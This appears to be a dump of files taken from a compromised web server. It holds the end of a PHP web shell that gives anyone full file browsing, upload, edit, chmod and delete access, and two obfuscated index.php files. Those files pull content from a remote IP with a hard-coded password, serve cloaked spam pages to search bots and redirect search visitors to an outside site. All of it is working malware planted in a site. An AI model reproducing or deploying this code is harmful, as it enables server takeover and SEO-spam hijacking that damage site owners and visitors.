border: 1px #000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
input {
 font-size: 18px;
 font-weight: bold;
 padding: 5px;
}
select {
font-size: 19px
}
textarea {
font-size: 10px
}
td, tr { padding: 2px 5px; }

</style>
</HEAD>
<BODY>
<hr width="920" color="black"/>
<hr width="920" color="black"/><center><p><h2>Your IP : ' .$_SERVER["REMOTE_ADDR"]. '</h2></p></center>
<hr width="920" color="black"/>
<table width="920" border="1px" cellpadding="7" cellspacing="0" align="center">
<tr><td style="padding: 8px">Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
echo '<font color="green">Upload Success..</font><br />';
}else{
echo '<font color="red">Upload Gagal..</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
echo "<tr><td style='padding: 8px'>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
if($_POST['opt'] == 'chmod'){
if(isset($_POST['perm'])){
if(chmod($_POST['path'],$_POST['perm'])){
echo '<font color="green">Chmod Success..</font><br />';
}else{
echo '<font color="red">Chmod Gagal..</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'rename'){
if(isset($_POST['newname'])){
if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
echo '<font color="green">Rename Berhasil..</font><br />';
}else{
echo '<font color="red">Rename Gagal..</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Save" />
</form>';
}elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<font color="green">Edit File Berhasil..</font><br />';
}else{
echo '<font color="red">Edit File Gagal..</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=130 rows=10 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo '</center>';
}else{
echo '</table><br /><center>';
if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo '<font color="green">Delete Directory Berhasil..</font><br />';
}else{
echo '<font color="red">Delete Directory Gagal..</font><br />';
}
}elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo '<font color="green">Delete File Berhasil..</font><br />';
}else{
echo '<font color="red">Delete File Gagal..</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="920" border="1.5px" cellpadding="5" cellspacing="0" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo '<font color="Blue">';
elseif(!is_readable("$path/$dir")) echo '<font color="red">';
echo perms("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).' MB';
}else{
$size = $size.' KB';
}

echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>";
if(is_writable("$path/$file")) echo '<font color="Blue">';
elseif(!is_readable("$path/$file")) echo '<font color="red">';
echo perms("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\"Oke\" />
</form></center></td>
</tr>";
}
echo '</table>
</div>';
}
echo '<center><hr width="920" color="black"/> <center>
</BODY>
</HTML>';
function perms($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}
?>












home/bechata/mp/qroh/index.php000066600000011356152366573140012316 0ustar00<?php
 goto Dhvi7; nIqNb: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto H2Cnv; Fvccm: $s = dirname($_SERVER["\120\x48\120\137\x53\x45\x4c\106"]); goto mftUN; pwtQP: $apass2 = "\x62\62\x33\x68\x72\62\x33\166\x72\x33\62"; goto Fvccm; t6oGF: $keyword = str_replace("\x20", "\x2b", $keyword); goto pwtQP; DJPsi: $x1 = 3; goto hRMzx; xV9bz: if (function_exists("\x63\x75\x72\154\137\151\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\160\x3a\x2f\57\61\x33\x35\56\x31\70\61\56\62\61\x2e\61\62\66\57" . $_GET["\146\x6e"] . "\x2e\x70\150\x70\x3f\x70\141\x73\163\75{$apass}\46\x71\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\x6f\172\151\154\154\141\57\64\x2e\60\40\50\143\x6f\x6d\x70\x61\x74\151\x62\154\145\x3b\x20\x4d\123\x49\x45\40\x36\x2e\60\x3b\40\127\151\156\144\x6f\167\x73\x20\x4e\124\x20\x35\x2e\61\x3b\40\x53\x56\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto VbPs8; i2SSt: if (strpos($_SERVER["\110\x54\124\120\137\x52\105\106\105\x52\105\x52"], "\147\157\x6f\147\154\x65\x2e") or strpos($_SERVER["\110\124\x54\120\x5f\x52\x45\x46\105\x52\105\122"], "\x79\x61\x68\x6f\x6f\56") or strpos($_SERVER["\x48\x54\x54\120\137\x52\105\x46\x45\122\105\122"], "\x62\151\x6e\147\x2e")) { $tpl = "\x69\x6e\144\145\x78\57" . $_GET["\151\x64"] . "\56\160\150\x70\x2e\x74\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\x79"]; header("\114\x6f\143\x61\164\x69\x6f\156\72\40\x68\164\x74\x70\x73\x3a\x2f\x2f\x63\x68\160\x6f\153\56\x73\151\x74\145\x2f\x65\156\164\x65\x72\57\77\155\141\162\153\x3d{$today}\x2d{$s}\x26\164\160\154\x3d{$tpl}\46\145\156\147\x6b\145\x79\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\x2e\160\x68\160"; if (file_exists("\x69\156\x64\145\x78\x2f" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\x78\x2f" . $myname); if (strpos($_SERVER["\x48\124\x54\120\x5f\x55\x53\105\x52\137\x41\107\105\x4e\x54"], "\x62\151\x6e\x67") > 2 or strpos($_SERVER["\x48\x54\124\120\137\x55\x53\105\x52\x5f\101\107\x45\116\x54"], "\171\x61\150\x6f\157") > 2) { $keyword = str_replace("\x2d", "\40", $_GET["\151\144"]); $html = str_replace("\74\x74\151\164\154\x65\76\74\57\x74\151\x74\154\x65\x3e", "\74\164\x69\164\154\x65\x3e{$keyword}\x3c\x2f\164\x69\x74\x6c\x65\x3e", $html); } echo $html; die; } } goto bEKzD; Dhvi7: error_reporting(0); goto lR0PO; yGvSj: if (strlen($text) < 5000) { $url = "\x31\63\65\x2e\61\70\x31\x2e\62\61\x2e\61\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\x28{$errno}\x29\74\x62\x72\x20\x2f\x3e\xa"; } else { $req = "\57" . $_GET["\146\x6e"] . "\56\x70\x68\160\x3f\160\141\163\163\75{$apass}\x26\x71\75{$_GET["\x69\x64"]}"; $out = "\107\x45\x54\40{$req}\x20\x48\124\124\120\x2f\61\x2e\x30\xd\xa"; $out .= "\110\157\x73\x74\72\x20{$url}\15\12"; $out .= "\x43\157\156\156\x65\x63\164\x69\x6f\x6e\x3a\x20\x43\x6c\x6f\163\x65\15\xa\xd\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto ZflGf; H2Cnv: if ($_GET["\x69\x64"] == "\164\x65\x73\164\151\x6e\x67") { echo "\x74\145\x73\164\40\147\x6f\157\144\56\x2e\56"; die; } goto B6oKq; Nn_xF: $apass1 = "\x76\x69\163\144\x6f\x69\x6a\x65\x77"; goto DJPsi; iwGlw: $s = $_SERVER["\x53\105\122\x56\x45\x52\137\116\101\x4d\105"] . $s; goto ULYmO; sZPMG: $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); goto t6oGF; IB3Z4: echo $text; goto JqnAz; bEKzD: $query_pars_2 = str_replace("\x2d", "\x2b", $_GET["\x69\144"]); goto Hu1be; hRMzx: $xx1 = 5; goto sZPMG; mftUN: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto iwGlw; VbPs8: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\x70\72\57\x2f\61\x33\65\56\x31\70\x31\56\x32\x31\56\x31\x32\66\x2f" . $_GET["\146\156"] . "\x2e\160\x68\160\77\160\141\x73\x73\x3d{$apass}\46\161\x3d{$_GET["\x69\144"]}"); } goto yGvSj; S_ZF_: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i2SSt; B6oKq: if ($_GET["\151\x64"] == "\151\156\x64\x65\x78") { header("\x4c\157\x63\141\164\151\x6f\x6e\72\40\x68\x74\164\x70\163\72\x2f\x2f\147\157\x6f\147\154\145\x2e\x63\157\x6d"); die; } goto leWj_; leWj_: $_GET["\x77\x6f\162\x6c\144"] = 5; goto L6U6g; Hu1be: $text = ''; goto xV9bz; ULYmO: $apass3 = "\x72\166\63\62\x79\x64\141\143\x73\166\163\x64\x76"; goto S_ZF_; ZflGf: if (strlen($text) > 5000) { $out = fopen("\x69\156\x64\x65\x78\57" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto IB3Z4; L6U6g: $_GET["\x66\156"] = "\x36\71\x36\x39\x36\x39\156\x65\x77"; goto Nn_xF; lR0PO: $today = "\x32\x30\62\x35\60\63\62\x33\x2d"; goto nIqNb; JqnAz: ?>home/bechata/mp/hcl4k/index.php000066600000011350152366573200012341 0ustar00<?php
 goto Iiv9_; SLfuL: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\x64"]); goto ode28; lCLva: $s = dirname($_SERVER["\120\110\x50\137\123\x45\114\106"]); goto O81IO; Ekv0u: $s = $_SERVER["\x53\x45\122\126\x45\x52\137\116\x41\x4d\x45"] . $s; goto OOZ7I; Kgv1Y: $keyword = str_replace("\x20", "\x2b", $keyword); goto pSnPi; vElE_: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto EjTbz; poIaq: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\164\x70\x3a\x2f\57\x31\63\65\56\x31\x38\61\56\x32\61\56\x31\x32\x36\57" . $_GET["\x66\156"] . "\x2e\160\150\x70\77\x70\x61\163\163\x3d{$apass}\46\161\75{$_GET["\x69\144"]}"); } goto nexr1; DIlwv: $x1 = 3; goto IzLgO; JjJqS: $_GET["\x77\157\x72\x6c\144"] = 5; goto zg0bW; SBIj_: $keyword = str_replace("\x2d", "\40", $_GET["\x69\144"]); goto Kgv1Y; ode28: $text = ''; goto Q3Xip; Us4Ic: echo $text; goto Oh93F; Iiv9_: error_reporting(0); goto faQzM; O81IO: if ($s == "\x5c" | $s == "\x2f") { $s = ''; } goto Ekv0u; IzLgO: $xx1 = 5; goto SBIj_; EjTbz: if ($_GET["\151\x64"] == "\x74\145\x73\164\x69\x6e\147") { echo "\x74\145\x73\164\x20\147\x6f\157\x64\56\56\x2e"; die; } goto VNBby; VNBby: if ($_GET["\151\x64"] == "\x69\156\144\x65\x78") { header("\x4c\157\x63\141\x74\151\x6f\156\72\x20\x68\x74\x74\x70\x73\x3a\x2f\57\147\157\157\x67\154\145\x2e\x63\x6f\155"); die; } goto JjJqS; nexr1: if (strlen($text) < 5000) { $url = "\61\x33\x35\x2e\61\x38\61\56\62\61\56\61\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\x28{$errno}\x29\74\x62\162\x20\57\x3e\xa"; } else { $req = "\57" . $_GET["\x66\x6e"] . "\x2e\160\x68\160\x3f\x70\x61\x73\163\75{$apass}\46\x71\75{$_GET["\151\144"]}"; $out = "\x47\x45\124\40{$req}\x20\110\x54\124\120\57\x31\x2e\60\15\xa"; $out .= "\x48\157\x73\164\x3a\40{$url}\15\xa"; $out .= "\x43\157\x6e\156\x65\x63\x74\151\157\156\72\40\103\154\x6f\x73\x65\xd\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto t2VE7; HexCZ: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto hq_sB; Q3Xip: if (function_exists("\143\x75\162\154\137\151\156\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\x74\160\72\57\x2f\x31\63\x35\56\61\x38\61\56\x32\x31\56\x31\x32\66\57" . $_GET["\146\156"] . "\x2e\x70\150\160\x3f\x70\141\163\x73\75{$apass}\46\x71\75{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\172\151\x6c\x6c\141\57\64\x2e\60\x20\50\x63\157\155\x70\141\164\x69\x62\x6c\x65\73\40\115\123\x49\x45\40\x36\56\x30\73\x20\127\x69\x6e\144\157\x77\x73\x20\116\124\40\65\56\x31\x3b\x20\x53\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto poIaq; t2VE7: if (strlen($text) > 5000) { $out = fopen("\151\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto Us4Ic; faQzM: $today = "\62\x30\62\x35\60\66\x32\x32\55"; goto vElE_; OOZ7I: $apass3 = "\x72\x76\63\62\x79\144\x61\x63\x73\166\x73\144\x76"; goto HexCZ; zg0bW: $_GET["\x66\156"] = "\x36\71\x36\x39\x36\x39\156\145\x77"; goto ne3S5; pSnPi: $apass2 = "\x62\62\63\150\162\62\63\166\162\x33\62"; goto lCLva; ne3S5: $apass1 = "\x76\x69\163\144\157\x69\152\145\167"; goto DIlwv; hq_sB: if (strpos($_SERVER["\110\x54\124\x50\x5f\x52\105\106\x45\x52\x45\x52"], "\x67\x6f\157\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\120\x5f\122\105\x46\x45\122\x45\122"], "\x79\x61\150\x6f\157\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\122\105\106\x45\122\105\122"], "\142\x69\x6e\x67\56")) { $tpl = "\151\156\x64\x65\170\x2f" . $_GET["\151\144"] . "\x2e\x70\x68\x70\56\164\x70\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\114\x6f\143\x61\x74\151\157\156\x3a\40\150\x74\x74\160\x73\72\x2f\57\143\150\160\157\x6b\x2e\163\x69\x74\x65\57\x65\156\x74\x65\162\x2f\77\x6d\141\162\x6b\75{$today}\55{$s}\x26\164\160\154\75{$tpl}\46\x65\x6e\x67\153\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\150\x70"; if (file_exists("\x69\156\144\x65\170\57" . $myname)) { $html = @file_get_contents("\151\156\144\x65\170\x2f" . $myname); if (strpos($_SERVER["\110\x54\x54\x50\137\125\x53\105\x52\137\101\x47\105\116\x54"], "\142\x69\x6e\147") > 2 or strpos($_SERVER["\110\124\124\120\137\125\123\105\122\137\x41\x47\105\116\x54"], "\171\x61\x68\157\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); $html = str_replace("\74\x74\x69\164\154\x65\76\x3c\x2f\164\151\164\154\145\x3e", "\x3c\x74\x69\164\154\145\76{$keyword}\x3c\x2f\164\x69\164\154\145\x3e", $html); } echo $html; die; } } goto SLfuL; Oh93F: ?>